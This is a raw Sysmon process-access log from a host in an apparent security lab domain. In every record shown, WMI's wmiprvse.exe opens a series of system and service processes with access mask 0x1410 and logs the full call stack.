16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.287{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.287{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.286{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.285{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.285{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.284{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.283{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.282{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.282{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.281{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.280{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 